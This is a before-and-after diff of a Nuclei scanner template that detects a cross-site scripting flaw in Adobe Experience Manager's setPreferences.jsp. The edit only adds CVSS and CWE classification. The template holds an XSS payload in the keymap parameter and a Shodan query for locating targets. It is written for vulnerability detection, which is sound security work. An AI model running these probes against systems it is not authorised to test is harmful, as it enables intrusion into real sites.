misconfiguration/aem/aem-setpreferences-xss.yaml (before)
id: aem-setpreferences-xss

info:
  name: Adobe Experience Manager  - Cross-Site Scripting
  author: zinminphy0,dhiyaneshDK
  severity: medium
  description:  Adobe Experience Manager contains a cross-site scripting vulnerability via setPreferences.
  reference:
    - https://www.youtube.com/watch?v=VwLSUHNhrOw&t=142s
    - https://github.com/projectdiscovery/nuclei-templates/issues/3225
    - https://twitter.com/zin_min_phyo/status/1465394815042916352
  metadata:
    shodan-query: http.component:"Adobe Experience Manager"
  tags: aem,xss

requests:
  - method: GET
    path:
      - "{{BaseURL}}/crx/de/setPreferences.jsp;%0A.html?language=en&keymap=<svg/onload=confirm(document.domain);>//a"
      - "{{BaseURL}}/content/crx/de/setPreferences.jsp;%0A.html?language=en&keymap=<svg/onload=confirm(document.domain);>//a"

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "<svg/onload=confirm(document.domain);>"
          - 'A JSONObject text must begin with'
        condition: and

      - type: status
        status:
          - 400

# Enhanced by md on 2022/09/14

misconfiguration/aem/aem-setpreferences-xss.yaml (after)
id: aem-setpreferences-xss

info:
  name: Adobe Experience Manager  - Cross-Site Scripting
  author: zinminphy0,dhiyaneshDK
  severity: medium
  description: Adobe Experience Manager contains a cross-site scripting vulnerability via setPreferences.
  reference:
    - https://www.youtube.com/watch?v=VwLSUHNhrOw&t=142s
    - https://github.com/projectdiscovery/nuclei-templates/issues/3225
    - https://twitter.com/zin_min_phyo/status/1465394815042916352
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cwe-id: CWE-79
  metadata:
    shodan-query: http.component:"Adobe Experience Manager"
  tags: aem,xss

requests:
  - method: GET
    path:
      - "{{BaseURL}}/crx/de/setPreferences.jsp;%0A.html?language=en&keymap=<svg/onload=confirm(document.domain);>//a"
      - "{{BaseURL}}/content/crx/de/setPreferences.jsp;%0A.html?language=en&keymap=<svg/onload=confirm(document.domain);>//a"

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "<svg/onload=confirm(document.domain);>"
          - 'A JSONObject text must begin with'
        condition: and

      - type: status
        status:
          - 400

# Enhanced by md on 2022/09/14

misconfiguration/aem/aem-setpreferences-xss.yaml (diff)
@@ -4,11 +4,15 @@ info:
   name: Adobe Experience Manager  - Cross-Site Scripting
   author: zinminphy0,dhiyaneshDK
   severity: medium
-  description:  Adobe Experience Manager contains a cross-site scripting vulnerability via setPreferences.
+  description: Adobe Experience Manager contains a cross-site scripting vulnerability via setPreferences.
   reference:
     - https://www.youtube.com/watch?v=VwLSUHNhrOw&t=142s
     - https://github.com/projectdiscovery/nuclei-templates/issues/3225
     - https://twitter.com/zin_min_phyo/status/1465394815042916352
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
+    cvss-score: 7.2
+    cwe-id: CWE-79
   metadata:
     shodan-query: http.component:"Adobe Experience Manager"
   tags: aem,xss
